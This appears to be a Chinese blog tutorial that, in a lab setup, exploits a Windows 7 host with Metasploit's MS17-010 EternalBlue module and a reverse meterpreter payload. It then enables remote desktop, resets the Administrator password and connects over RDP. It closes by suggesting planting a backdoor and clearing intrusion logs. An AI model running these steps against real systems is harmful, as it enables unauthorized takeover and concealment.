Kali下metasploit渗透Windows7

本文详细介绍了如何在Kali Linux环境下,使用metasploit框架对Windows7系统进行渗透测试。首先通过nmap扫描靶机445端口,然后利用metasploit的ms17-010漏洞进行攻击,成功后开启靶机的3389端口,并更改靶机管理员密码,最后通过Kali的3389连接工具远程控制靶机。

Kali下metasploit渗透Windows7/教程详细/

靶场环境

操作系统 Kali_Linux IP:172.17.201.44
靶机 windows7 IP:172.17.201.12

使用工具

metasploit
nmap


正文
1.首先使用namp对靶机进行扫描,确定445端口是否开启
在这里插入图片描述
2.打开metasploit搜索ms17-010

1. msfconsole
2. search ms17-010

在这里插入图片描述
3.选择漏洞验证扫描工具并设置参数

1. use auxiliary/admin/smb/ms17_010_command
2. set rhost 靶机ip
3. exploit 运行程序

在这里插入图片描述

4.选择攻击模块并设置参数

1. use exploit/windows/smb/ms17_010_eternalblue //选择模块
2. options //查看详细信息
3. set payload windows/x64/meterpreter/reverse_tcp //选择荷载
4. set rhost 靶机ip
5. set lhost 操作机ip//kali
6. exploit //运行攻击

在这里插入图片描述
5.攻击成功反馈
在这里插入图片描述
6.开启靶机3389

run getgui -e // 开启靶机3389端口(远程桌面用)

在这里插入图片描述
再用nmap验证一下端口是否已经开启
在这里插入图片描述

7.输入shell进入目标系统

shell 
chcp 65001 //解决shell后windows终端乱码

在这里插入图片描述

在这里插入图片描述
8.更改靶机管理员密码

net user Administrator  12345678  

在这里插入图片描述
9.使用kali自带的3389连接工具远程靶机

rdesktop 靶机ip//远程连接靶机

在这里插入图片描述
选择其他用户后输入刚才你设置的用户名与密码 //注意区分大小写
在这里插入图片描述
接下来生成后门放上去,清除入侵记录就好了

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值